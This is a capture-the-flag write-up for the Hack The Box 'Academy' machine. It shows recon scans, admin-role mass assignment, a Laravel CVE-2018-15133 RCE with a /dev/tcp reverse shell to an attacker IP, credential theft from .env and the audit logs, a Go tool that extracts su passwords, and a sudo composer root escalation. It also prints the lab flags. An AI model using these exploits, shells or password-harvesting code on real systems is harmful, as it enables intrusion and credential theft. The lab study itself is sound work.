HTB Academy done
Academy
Notes
OS:
Linux
Technology:
MySQL
Laravel
IP Address:
10.129.1.78
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open mysqlx MySQL X protocol listener
Users and pass:
From website: http://academy.htb/admin-page.php
cry0l1t3
mrb3n
---
From website: http://dev-staging-01.academy.htb/
DB_HOST "127.0.0.1"
DB_PORT "3306"
DB_DATABASE "homestead"
DB_USERNAME "homestead"
DB_PASSWORD "secret"
---
From file: /var/www/html/academy/.env (read as www-data after the Laravel RCE)
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
---
SSH login (the DB password from .env is reused for the cry0l1t3 account):
cry0l1t3
mySup3rP4s5w0rd!!
---
From aureport --tty (TTY keystroke audit records under /var/log/audit, readable as a member of adm)
L: mrb3n
P: mrb3n_Ac@d3my!
---
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.1.78_nmap 10.129.1.78 ; cat 10.129.1.78_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 12:16 CET
Nmap scan report for 10.129.1.78
Host is up (0.033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://academy.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx MySQL X protocol listener
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ cat /etc/hosts | tail -n1
10.129.1.78 academy.htb
Ffuf
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ ffuf -u http://10.129.1.78/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.129.1.78_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.1.78/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : 10.129.1.78_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
academy [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/FUZZ
index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 62ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/FUZZ
app [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 37ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/app/FUZZ
composer [Status: 200, Size: 1512, Words: 470, Lines: 61, Duration: 30ms]
config [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 36ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/config/FUZZ
database [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/database/FUZZ
package [Status: 200, Size: 1150, Words: 188, Lines: 23, Duration: 37ms]
public [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/public/FUZZ
readme [Status: 200, Size: 3622, Words: 289, Lines: 60, Duration: 36ms]
readme.md [Status: 200, Size: 3622, Words: 289, Lines: 60, Duration: 38ms]
resources [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 38ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/resources/FUZZ
routes [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 39ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/routes/FUZZ
server.php [Status: 200, Size: 2117, Words: 890, Lines: 77, Duration: 43ms]
storage [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 37ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/storage/FUZZ
tests [Status: 301, Size: 318, Words: 20, Lines: 10, Duration: 42ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/tests/FUZZ
vendor [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 34ms]
[INFO] Adding a new job to the queue: http://10.129.1.78/academy/vendor/FUZZ
[INFO] Starting queued job on target: http://10.129.1.78/academy/app/FUZZ
[INFO] Starting queued job on target: http://10.129.1.78/academy/config/FUZZ
app.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 47ms]
auth.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
cache.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 35ms]
database.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
logging.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 41ms]
mail.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 41ms]
queue.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 61ms]
services.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
session.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 43ms]
view.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 35ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/database/FUZZ
seeds [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 49ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/database/seeds/
[INFO] Starting queued job on target: http://10.129.1.78/academy/public/FUZZ
admin.php [Status: 200, Size: 2633, Words: 668, Lines: 142, Duration: 53ms]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
home.php [Status: 302, Size: 55034, Words: 4001, Lines: 1050, Duration: 46ms]
images [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 71ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/public/images/
index.php [Status: 200, Size: 2117, Words: 890, Lines: 77, Duration: 129ms]
login.php [Status: 200, Size: 2627, Words: 667, Lines: 142, Duration: 40ms]
register.php [Status: 200, Size: 3003, Words: 801, Lines: 149, Duration: 36ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/resources/FUZZ
assets [Status: 301, Size: 329, Words: 20, Lines: 10, Duration: 52ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/resources/assets/
lang [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 45ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/resources/lang/
views [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 59ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/resources/views/
[INFO] Starting queued job on target: http://10.129.1.78/academy/routes/FUZZ
api.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 47ms]
channels.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 104ms]
console.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
web.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 62ms]
[INFO] Starting queued job on target: http://10.129.1.78/academy/storage/FUZZ
app [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/storage/app/
framework [Status: 301, Size: 330, Words: 20, Lines: 10, Duration: 51ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/storage/framework/
logs [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 53ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/storage/logs/
[INFO] Starting queued job on target: http://10.129.1.78/academy/tests/FUZZ
[INFO] Starting queued job on target: http://10.129.1.78/academy/vendor/FUZZ
autoload.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 140ms]
bin [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 34ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/bin/
composer [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 71ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/composer/
league [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 38ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/league/
psy [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 32ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/psy/
symfony [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.129.1.78/academy/vendor/symfony/
:: Progress: [163752/163752] :: Job [11/11] :: 1063 req/sec :: Duration: [0:03:21] :: Errors: 0 ::
Nikto
Nikto flags admin.php with its EasyNews 4.3 signature (CVE-2006-5412); that is a path-name match against the academy app's own admin.php, and it is not used further. The useful findings are the admin.php / login.php / config.php hits.
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ nikto -host http://academy.htb | tee academy.htb_nikto
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.129.1.78
+ Target Hostname: academy.htb
+ Target Port: 80
+ Start Time: 2025-03-18 12:25:07 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /admin.php?en_log_id=0&action=config: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php?en_log_id=0&action=users: EasyNews version 4.3 allows remote admin access. This PHP file should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5412
+ /admin.php: This might be interesting.
+ /login.php: Admin login page/section found.
+ 7962 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2025-03-18 12:30:30 (GMT1) (323 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Create an admin user
The registration POST carries a client-controlled roleid field; I changed it from 0 to 1 and the account was created with the admin role.
---
POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://academy.htb
Connection: keep-alive
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=14so4ccoh43rgifl8f676elbcm
Upgrade-Insecure-Requests: 1
Priority: u=0, i
uid=haker&password=%23Qwerty123%23&confirm=%23Qwerty123%23&roleid=1
Login as the admin user haker
http://academy.htb/admin-page.php
Interesting info on the admin page: "Complete initial set of modules" (cry0l1t3 / mrb3n), which gives two usernames
Add the new hostname dev-staging-01.academy.htb to /etc/hosts
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Academy]
└─$ cat /etc/hosts | tail -n1
10.129.1.78 academy.htb dev-staging-01.academy.htb
Error page on dev-staging-01.academy.htb
The Laravel app runs with debug output enabled (APP_ENV "local"), so the error page dumps its environment. I found more interesting info; details below:
DB_CONNECTION "mysql"
DB_HOST "127.0.0.1"
DB_PORT "3306"
DB_DATABASE "homestead"
DB_USERNAME "homestead"
DB_PASSWORD "secret"
___
APP_NAME "Laravel"
APP_ENV "local"
APP_KEY "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
Find exploit: CVE-2018-15133 (Laravel 5.5.40 and 5.6.x before 5.6.30: the X-XSRF-TOKEN header is decrypted with APP_KEY and passed to unserialize(), so a leaked APP_KEY gives RCE)
https://github.com/aljavier/exploit_laravel_cve-2018-15133
Run the exploit with a reverse-shell payload; the listener is on 10.10.14.48:80
┌──(.venv)─(kali㉿kali)-[~/…/writeups/HTB/HTB_Academy/exploit_laravel_cve-2018-15133]
└─$ python3 pwn_laravel.py http://dev-staging-01.academy.htb "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" -c "bash -c 'exec bash -i &>/dev/tcp/10.10.14.48/80 <&1'"
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Academy/exploit_laravel_cve-2018-15133]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.48] from (UNKNOWN) [10.129.1.78] 52840
bash: cannot set terminal process group (1143): Inappropriate ioctl for device
bash: no job control in this shell
www-data@academy:/var/www/html/htb-academy-dev-01/public$ cd /home
cd /home
www-data@academy:/home$ ls -a
ls -a
.
..
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n
www-data@academy:/home$
Read .env in /var/www/html/academy (the academy.htb app, separate from htb-academy-dev-01)
I found new creds for the MySQL DB
---
www-data@academy:/var/www/html/academy$ cat .env | grep DB
cat .env | grep DB
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
www-data@academy:/var/www/html/academy$
Read flag: user.txt (switch to cry0l1t3 with the reused .env DB password)
www-data@academy:/var/www/html/academy$ cd /home
cd /home
www-data@academy:/home$ ls
ls
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n
www-data@academy:/home$ su cry0l1t3
su cry0l1t3
Password: mySup3rP4s5w0rd!!
id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
cd ~
ls -a
.
..
.bash_history
.bash_logout
.bashrc
.cache
.local
.profile
user.txt
cat user.txt
5cd9e79d0baae192db5be242df0e0cff
Read logs in /var/log/audit/
The user can read the audit logs because he is a member of the adm group
___
cry0l1t3@academy:~$ id
id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
cry0l1t3@academy:~$
---
Running aureport --tty shows the TTY keystroke audit; the entry recorded by comm=su right after "su mrb3n" is what was typed at the password prompt, so it should be the password for mrb3n (a guess, confirmed by the su below)
___
cry0l1t3@academy:~$ aureport --tty
aureport --tty
TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
...
...
...
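Why aureport hands over the password: pam_tty_audit records the keystrokes of the audited session, including what is typed at a prompt with echo off, and on this box the adm group can read the audit log. The Go program below is an added example (not from the writeup): it parses the `aureport --tty` rows, rebuilds the typed text from aureport's quoted-text-and-<key> rendering, and pairs each shell row that typed `su [-] [user]` with the next row from comm=su in the same session. Rows 1-5 of the embedded sample are the ones from the box; rows 6-7 are constructed to exercise `su -` (target root) and a <backspace> correction. The <backspace>/<del> key names and the function names are my assumptions about auparse output, not something taken from the page.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// TTYEvent is one row of `aureport --tty`: # date time event auid term sess comm data
type TTYEvent struct {
	Date, Time, Event, AUID, Term, Sess, Comm, Data string
}

// SuCredential is a target/password pair recovered from a `su` exchange.
type SuCredential struct {
	When, Session, Target, Password string
}

// sampleReport is constructed: rows 1-5 are the ones from the box, rows 6-7
// were added to exercise "su -" (target root) and a <backspace> correction.
const sampleReport = `TTY Report
===============================================
# date time event auid term sess comm data
===============================================
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
6. 08/12/2020 02:29:01 95 0 ? 1 sh "su -",<nl>
7. 08/12/2020 02:29:05 96 0 ? 1 su "Pa55w0rdd",<backspace>,<nl>
`

var rowRe = regexp.MustCompile(`^\s*\d+\.\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$`)

// ParseTTYReport keeps only numbered rows; headers, rulers and NOTE lines are skipped.
func ParseTTYReport(report string) []TTYEvent {
	var events []TTYEvent
	for _, line := range strings.Split(report, "\n") {
		if m := rowRe.FindStringSubmatch(line); m != nil {
			events = append(events, TTYEvent{m[1], m[2], m[3], m[4], m[5], m[6], m[7], strings.TrimSpace(m[8])})
		}
	}
	return events
}

// Keystrokes rebuilds what was typed from aureport's rendering: quoted runs of
// printable text and <key> names separated by commas. Backspace-type keys drop
// the previous character; other named keys (<nl>, <^D>, ...) are ignored.
// The key names are assumed to be the ones auparse prints.
func Keystrokes(data string) string {
	var out []byte
	for i := 0; i < len(data); i++ {
		switch data[i] {
		case '"':
			end := strings.IndexByte(data[i+1:], '"')
			if end < 0 {
				return string(append(out, data[i+1:]...))
			}
			out = append(out, data[i+1:i+1+end]...)
			i += end + 1
		case '<':
			end := strings.IndexByte(data[i:], '>')
			if end < 0 {
				return string(out)
			}
			if k := data[i+1 : i+end]; (k == "backspace" || k == "del" || k == "^H") && len(out) > 0 {
				out = out[:len(out)-1]
			}
			i += end
		}
	}
	return string(out)
}

// ExtractSuCredentials pairs a shell row that typed "su [-] [user]" with the
// next row from comm=su in the same session: that row is the password, which
// pam_tty_audit recorded even though the terminal had echo off.
func ExtractSuCredentials(events []TTYEvent) []SuCredential {
	var creds []SuCredential
	for i := 0; i+1 < len(events); i++ {
		cmd := strings.Fields(Keystrokes(events[i].Data))
		next := events[i+1]
		if len(cmd) == 0 || cmd[0] != "su" || next.Comm != "su" || next.Sess != events[i].Sess {
			continue
		}
		target := "root" // "su" and "su -" both switch to root
		if last := cmd[len(cmd)-1]; len(cmd) > 1 && !strings.HasPrefix(last, "-") {
			target = last
		}
		creds = append(creds, SuCredential{
			When: next.Date + " " + next.Time, Session: next.Sess,
			Target: target, Password: Keystrokes(next.Data),
		})
	}
	return creds
}

func main() {
	for _, c := range ExtractSuCredentials(ParseTTYReport(sampleReport)) {
		fmt.Printf("%s sess=%s su %s password=%q\n", c.When, c.Session, c.Target, c.Password)
	}
}
```

The fix on the defending side is configuration, not the parser: pam_tty_audit only records input typed with echo off when its log_passwd option is set, and the audit log should not be readable by a broad group such as adm. Either change on its own would have kept this password out of reach of the cry0l1t3 account.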
Login as user: mrb3n
L: mrb3n
P: mrb3n_Ac@d3my!
---
cry0l1t3@academy:~$ su mrb3n
su mrb3n
Password: mrb3n_Ac@d3my!
$ id
id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
$
$ sudo -i
sudo -i
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Sorry, user mrb3n is not allowed to execute '/bin/bash' as root on academy.
$ sudo -l
sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer
$
Privilege Escalation: sudo /usr/bin/composer
composer run-script executes whatever command the composer.json in the working directory defines, so a writable composer.json plus sudo on composer is a root shell (GTFOBins):
https://gtfobins.github.io/gtfobins/composer/#sudo
---
$ TF=$(mktemp -d)
TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
sudo composer --working-dir=$TF run-script x
PHP Warning: PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning: PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
#
# id
id
uid=0(root) gid=0(root) groups=0(root)
Read flag: root.txt
# cd /root/
cd /root/
#
# ls -a
ls -a
. .bash_history .composer root.txt .ssh
.. .bashrc .local .selected_editor .viminfo
academy.txt .cache .profile snap .wget-hsts
#
# cat academy.txt
cat academy.txt
██╗ ██╗████████╗██████╗ █████╗ ██████╗ █████╗ ██████╗ ███████╗███╗ ███╗██╗ ██╗
██║ ██║╚══██╔══╝██╔══██╗ ██╔══██╗██╔════╝██╔══██╗██╔══██╗██╔════╝████╗ ████║╚██╗ ██╔╝
███████║ ██║ ██████╔╝ ███████║██║ ███████║██║ ██║█████╗ ██╔████╔██║ ╚████╔╝
██╔══██║ ██║ ██╔══██╗ ██╔══██║██║ ██╔══██║██║ ██║██╔══╝ ██║╚██╔╝██║ ╚██╔╝
██║ ██║ ██║ ██████╔╝ ██║ ██║╚██████╗██║ ██║██████╔╝███████╗██║ ╚═╝ ██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═╝
We've been hard at work.
Check out our brand new training platform, Hack the Box Academy!
https://academy.hackthebox.eu/
Register an account and browse our initial list of courses!
_.-'`'-._
.-' _ '-.
`-.__ `\_.-'
| `-``\|
`-.....-H
T
B
#
# cat root.txt
cat root.txt
18a8f4e53a7975259d1388ba8d5591db
#
References
[Laravel exploit for CVE-2018-15133](https://github.com/aljavier/exploit_laravel_cve-2018-15133)
[GTFOBins - composer](https://gtfobins.github.io/gtfobins/composer/#sudo)
Lessons Learned